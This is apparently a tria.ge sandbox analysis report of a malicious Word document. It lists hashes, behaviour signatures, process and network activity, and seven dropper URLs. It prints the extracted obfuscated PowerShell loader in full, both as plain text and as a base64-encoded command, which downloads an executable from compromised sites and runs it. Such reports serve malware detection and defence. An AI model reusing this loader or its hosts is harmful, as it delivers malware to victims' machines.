Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

268104ac7f...18.doc

windows7-x64

10

268104ac7f...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2024, 20:05 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    268104ac7fd244e33b0d072e3aaf8c7f_JaffaCakes118.doc

  • Size

    194KB

  • MD5

    268104ac7fd244e33b0d072e3aaf8c7f

  • SHA1

    165cb836f16b05ebb35ff609e09721a9df871427

  • SHA256

    b91795826d1ceca51e57aeb1aa43ac0960c1aed23a0a8ea2949528f7a5938598

  • SHA512

    795ebe5b1ee0df803b4dfe356d51a8c1a571133f917e2864e4accb71dadcbaa0ee8e79dafb4fdf0c2bd980b6c3115bccf2e6ff5cc3d96fbcaf5ab7a4c51e4934

  • SSDEEP

    1536:DGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilqfqdFTaFVT/EA8s9p8cjMfmVS9:+rfrzOH98ipgAd58cxs

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$Mqvb5er=(('O'+'qrd_')+'1'+'v');.('new-it'+'e'+'m') $EnV:uSERprofiLE\FY6iR_w\bD8J_41\ -itemtype DirecTORY;[Net.ServicePointManager]::"SEcUrItYpRO`ToC`Ol" = (('tl'+'s12'+',')+' t'+'l'+('s1'+'1, ')+('t'+'ls'));$Cdnkjwa = (('E0'+'c6v')+'gg');$Ap3w899=(('J'+'14')+'4b'+'0y');$Gxj515h=$env:userprofile+(('{0}F'+'y'+'6i'+'r_w{0}B'+('d8j_4'+'1')+'{0}') -f[char]92)+$Cdnkjwa+('.e'+'xe');$Eoybts6=(('N'+'rda17')+'c');$C7e4yd9=&('new-'+'ob'+'ject') NEt.WebcLienT;$G2nvhm_=(('h'+'tt')+'p'+(':/'+'/bo')+'ys'+('86.co'+'m/')+('w'+'p-a')+('d'+'mi'+'n/m')+('O/*'+'h')+'t'+('tp://'+'dac'+'y'+'c'+'lin.com/3'+'qx'+'/')+'Z'+'/'+('*'+'ht')+('t'+'ps')+':'+('//fe'+'p')+('a'+'mi.c')+'o'+('m/'+'wp-')+('inclu'+'d')+('es/oRT/'+'*h'+'t'+'tps')+(':'+'//')+'xn'+('x'+'xf')+'u'+('l'+'lh')+('d'+'.c')+('om'+'/wp')+('-a'+'d')+('m'+'in/')+('N'+'A'+'K/*https')+':/'+'/'+'ww'+'w.'+('b'+'usi')+'n'+('ess'+'-')+('m'+'an'+'agement-d'+'eg')+('r'+'ee')+('.'+'ne')+('t/w'+'p-')+('sn'+'a')+('p'+'shots/W'+'/*h')+('t'+'tp')+':/'+('/'+'homestay'+'.'+'d')+'es'+'i'+'g'+'n'+'/'+'w'+('ord'+'p'+'ress/M')+('/*'+'ht')+('tp'+'s')+':/'+('/c'+'s')+('c-co'+'mun'+'i'+'ty.')+('com/w'+'p')+'-'+('admi'+'n/')+'6'+('D'+'W/'))."Sp`LIT"([char]42);$Gmapn7t=('N'+('f2k84'+'p'));foreach($Bgrksqo in $G2nvhm_){try{$C7e4yd9."do`Wn`LOAdFI`LE"($Bgrksqo, $Gxj515h);$H0ygsf1=(('O'+'pdq')+('68'+'v'));If ((&('Get'+'-It'+'em') $Gxj515h)."l`engTH" -ge 29527) {&('Invok'+'e-I'+'tem')($Gxj515h);$Ntz0j1l=(('B'+'tn')+('2vq'+'2'));break;$X12i74e=(('M60'+'4c')+'3'+'w')}}catch{}}$Gxoj1ib=(('Jl'+'q')+('wm'+'3_'))
URLs
exe.dropper

http://boys86.com/wp-admin/mO/
exe.dropper

http://dacyclin.com/3qx/Z/
exe.dropper

https://fepami.com/wp-includes/oRT/
exe.dropper

https://xnxxfullhd.com/wp-admin/NAK/
exe.dropper

https://www.business-management-degree.net/wp-snapshots/W/
exe.dropper

http://homestay.design/wordpress/M/
exe.dropper

https://csc-comunity.com/wp-admin/6DW/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\268104ac7fd244e33b0d072e3aaf8c7f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:360
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABNAHEAdgBiADUAZQByAD0AKAAoACcATwAnACsAJwBxAHIAZABfACcAKQArACcAMQAnACsAJwB2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAUgBwAHIAbwBmAGkATABFAFwARgBZADYAaQBSAF8AdwBcAGIARAA4AEoAXwA0ADEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAcgBJAHQAWQBwAFIATwBgAFQAbwBDAGAATwBsACIAIAA9ACAAKAAoACcAdABsACcAKwAnAHMAMQAyACcAKwAnACwAJwApACsAJwAgAHQAJwArACcAbAAnACsAKAAnAHMAMQAnACsAJwAxACwAIAAnACkAKwAoACcAdAAnACsAJwBsAHMAJwApACkAOwAkAEMAZABuAGsAagB3AGEAIAA9ACAAKAAoACcARQAwACcAKwAnAGMANgB2ACcAKQArACcAZwBnACcAKQA7ACQAQQBwADMAdwA4ADkAOQA9ACgAKAAnAEoAJwArACcAMQA0ACcAKQArACcANABiACcAKwAnADAAeQAnACkAOwAkAEcAeABqADUAMQA1AGgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ARgAnACsAJwB5ACcAKwAnADYAaQAnACsAJwByAF8AdwB7ADAAfQBCACcAKwAoACcAZAA4AGoAXwA0ACcAKwAnADEAJwApACsAJwB7ADAAfQAnACkAIAAtAGYAWwBjAGgAYQByAF0AOQAyACkAKwAkAEMAZABuAGsAagB3AGEAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEUAbwB5AGIAdABzADYAPQAoACgAJwBOACcAKwAnAHIAZABhADEANwAnACkAKwAnAGMAJwApADsAJABDADcAZQA0AHkAZAA5AD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcAZQBiAGMATABpAGUAbgBUADsAJABHADIAbgB2AGgAbQBfAD0AKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAoACcAOgAvACcAKwAnAC8AYgBvACcAKQArACcAeQBzACcAKwAoACcAOAA2AC4AYwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AYQAnACkAKwAoACcAZAAnACsAJwBtAGkAJwArACcAbgAvAG0AJwApACsAKAAnAE8ALwAqACcAKwAnAGgAJwApACsAJwB0ACcAKwAoACcAdABwADoALwAvACcAKwAnAGQAYQBjACcAKwAnAHkAJwArACcAYwAnACsAJwBsAGkAbgAuAGMAbwBtAC8AMwAnACsAJwBxAHgAJwArACcALwAnACkAKwAnAFoAJwArACcALwAnACsAKAAnACoAJwArACcAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAJwAvAC8AZgBlACcAKwAnAHAAJwApACsAKAAnAGEAJwArACcAbQBpAC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwAC0AJwApACsAKAAnAGkAbgBjAGwAdQAnACsAJwBkACcAKQArACgAJwBlAHMALwBvAFIAVAAvACcAKwAnACoAaAAnACsAJwB0ACcAKwAnAHQAcABzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAHgAbgAnACsAKAAnAHgAJwArACcAeABmACcAKQArACcAdQAnACsAKAAnAGwAJwArACcAbABoACcAKQArACgAJwBkACcAKwAnAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AdwBwACcAKQArACgAJwAtAGEAJwArACcAZAAnACkAKwAoACcAbQAnACsAJwBpAG4ALwAnACkAKwAoACcATgAnACsAJwBBACcAKwAnAEsALwAqAGgAdAB0AHAAcwAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHcAdwAnACsAJwB3AC4AJwArACgAJwBiACcAKwAnAHUAcwBpACcAKQArACcAbgAnACsAKAAnAGUAcwBzACcAKwAnAC0AJwApACsAKAAnAG0AJwArACcAYQBuACcAKwAnAGEAZwBlAG0AZQBuAHQALQBkACcAKwAnAGUAZwAnACkAKwAoACcAcgAnACsAJwBlAGUAJwApACsAKAAnAC4AJwArACcAbgBlACcAKQArACgAJwB0AC8AdwAnACsAJwBwAC0AJwApACsAKAAnAHMAbgAnACsAJwBhACcAKQArACgAJwBwACcAKwAnAHMAaABvAHQAcwAvAFcAJwArACcALwAqAGgAJwApACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBoAG8AbQBlAHMAdABhAHkAJwArACcALgAnACsAJwBkACcAKQArACcAZQBzACcAKwAnAGkAJwArACcAZwAnACsAJwBuACcAKwAnAC8AJwArACcAdwAnACsAKAAnAG8AcgBkACcAKwAnAHAAJwArACcAcgBlAHMAcwAvAE0AJwApACsAKAAnAC8AKgAnACsAJwBoAHQAJwApACsAKAAnAHQAcAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBjACcAKwAnAHMAJwApACsAKAAnAGMALQBjAG8AJwArACcAbQB1AG4AJwArACcAaQAnACsAJwB0AHkALgAnACkAKwAoACcAYwBvAG0ALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAoACcAYQBkAG0AaQAnACsAJwBuAC8AJwApACsAJwA2ACcAKwAoACcARAAnACsAJwBXAC8AJwApACkALgAiAFMAcABgAEwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARwBtAGEAcABuADcAdAA9ACgAJwBOACcAKwAoACcAZgAyAGsAOAA0ACcAKwAnAHAAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABCAGcAcgBrAHMAcQBvACAAaQBuACAAJABHADIAbgB2AGgAbQBfACkAewB0AHIAeQB7ACQAQwA3AGUANAB5AGQAOQAuACIAZABvAGAAVwBuAGAATABPAEEAZABGAEkAYABMAEUAIgAoACQAQgBnAHIAawBzAHEAbwAsACAAJABHAHgAagA1ADEANQBoACkAOwAkAEgAMAB5AGcAcwBmADEAPQAoACgAJwBPACcAKwAnAHAAZABxACcAKQArACgAJwA2ADgAJwArACcAdgAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABHAHgAagA1ADEANQBoACkALgAiAGwAYABlAG4AZwBUAEgAIgAgAC0AZwBlACAAMgA5ADUAMgA3ACkAIAB7ACYAKAAnAEkAbgB2AG8AawAnACsAJwBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEcAeABqADUAMQA1AGgAKQA7ACQATgB0AHoAMABqADEAbAA9ACgAKAAnAEIAJwArACcAdABuACcAKQArACgAJwAyAHYAcQAnACsAJwAyACcAKQApADsAYgByAGUAYQBrADsAJABYADEAMgBpADcANABlAD0AKAAoACcATQA2ADAAJwArACcANABjACcAKQArACcAMwAnACsAJwB3ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwB4AG8AagAxAGkAYgA9ACgAKAAnAEoAbAAnACsAJwBxACcAKQArACgAJwB3AG0AJwArACcAMwBfACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2680

    Network

    • flag-us
      DNS
      boys86.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      boys86.com
      IN A
      Response
    • flag-us
      DNS
      dacyclin.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      dacyclin.com
      IN A
      Response
    • flag-us
      DNS
      fepami.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      fepami.com
      IN A
      Response
      fepami.com
      IN A
      31.24.155.239
    • flag-us
      DNS
      xnxxfullhd.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      xnxxfullhd.com
      IN A
      Response
      xnxxfullhd.com
      IN A
      188.114.97.2
      xnxxfullhd.com
      IN A
      188.114.96.2
    • flag-us
      GET
      https://xnxxfullhd.com/wp-admin/NAK/
      powershell.exe
      Remote address:
      188.114.97.2:443
      Request
      GET /wp-admin/NAK/ HTTP/1.1
      Host: xnxxfullhd.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 08 May 2024 20:05:39 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      link: <https://xnxxfullhd.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHb2ft92eu0Y0f0Q%2F9dd8jHXPOZOo6QCUSZIFAp2FulkVUYqy9FP%2FnHwCBYsoQh19JiALgjL6emmnhJrZyAcGA%2B9%2B5Q5qlhYOBfcApxj%2BZJLUesKoRcj3iStNY%2Bc3mlMBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 880c10ce68796519-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      www.business-management-degree.net
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      www.business-management-degree.net
      IN A
      Response
      www.business-management-degree.net
      IN CNAME
      business-management-degree.net
      business-management-degree.net
      IN A
      178.128.184.106
    • flag-us
      DNS
      homestay.design
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      homestay.design
      IN A
      Response
    • flag-us
      DNS
      csc-comunity.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      csc-comunity.com
      IN A
      Response
    • 31.24.155.239:443
      fepami.com
      tls
      powershell.exe
      344 B
       219 B
       5
      5
    • 31.24.155.239:443
      fepami.com
      tls
      powershell.exe
      344 B
       219 B
       5
      5
    • 188.114.97.2:443
      https://xnxxfullhd.com/wp-admin/NAK/
      tls, http
      powershell.exe
      777 B
       6.7kB
       9
      10

      HTTP Request

      GET https://xnxxfullhd.com/wp-admin/NAK/

      HTTP Response

      404
    • 178.128.184.106:443
      www.business-management-degree.net
      tls
      powershell.exe
      368 B
       219 B
       5
      5
    • 178.128.184.106:443
      www.business-management-degree.net
      tls
      powershell.exe
      368 B
       219 B
       5
      5
    • 8.8.8.8:53
      boys86.com
      dns
      powershell.exe
      56 B
       129 B
       1
      1

      DNS Request

      boys86.com

    • 8.8.8.8:53
      dacyclin.com
      dns
      powershell.exe
      58 B
       131 B
       1
      1

      DNS Request

      dacyclin.com

    • 8.8.8.8:53
      fepami.com
      dns
      powershell.exe
      56 B
       72 B
       1
      1

      DNS Request

      fepami.com

      DNS Response

      31.24.155.239

    • 8.8.8.8:53
      xnxxfullhd.com
      dns
      powershell.exe
      60 B
       92 B
       1
      1

      DNS Request

      xnxxfullhd.com

      DNS Response

      188.114.97.2
      188.114.96.2

    • 8.8.8.8:53
      www.business-management-degree.net
      dns
      powershell.exe
      80 B
       110 B
       1
      1

      DNS Request

      www.business-management-degree.net

      DNS Response

      178.128.184.106

    • 8.8.8.8:53
      homestay.design
      dns
      powershell.exe
      61 B
       122 B
       1
      1

      DNS Request

      homestay.design

    • 8.8.8.8:53
      csc-comunity.com
      dns
      powershell.exe
      62 B
       135 B
       1
      1

      DNS Request

      csc-comunity.com

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      4b89f0e5de8b628a7b3a63b4ecbcefda

      SHA1

      e1dbb22623f50cd257ddf4f7edbe4ac68876d13d

      SHA256

      ab2a0418dd5260b553766e1395e409ad296a706d44220e890a329a2941291f6f

      SHA512

      21b1928efe9f17f9ae35f2093a78ae9ded5a7f442f753acd02c40fb00822d0ba23d7c1aa5d5ded0fff44525f7c7e7f18cf8809badc70a254304de25dde9875e2

      Download Submit

    • memory/360-33-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-2-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

      Download

    • memory/360-7-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-9-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-14-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-8-0x0000000005DA0000-0x0000000005EA0000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-6-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-19-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-0-0x000000002F8F1000-0x000000002F8F2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/360-32-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-66-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

      Download

    • memory/360-67-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-34-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-46-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

      Download

    • memory/360-48-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-49-0x0000000005A10000-0x0000000005B10000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/360-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/360-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2680-40-0x000000001B530000-0x000000001B812000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2680-41-0x0000000002250000-0x0000000002258000-memory.dmp

      Filesize

      32KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.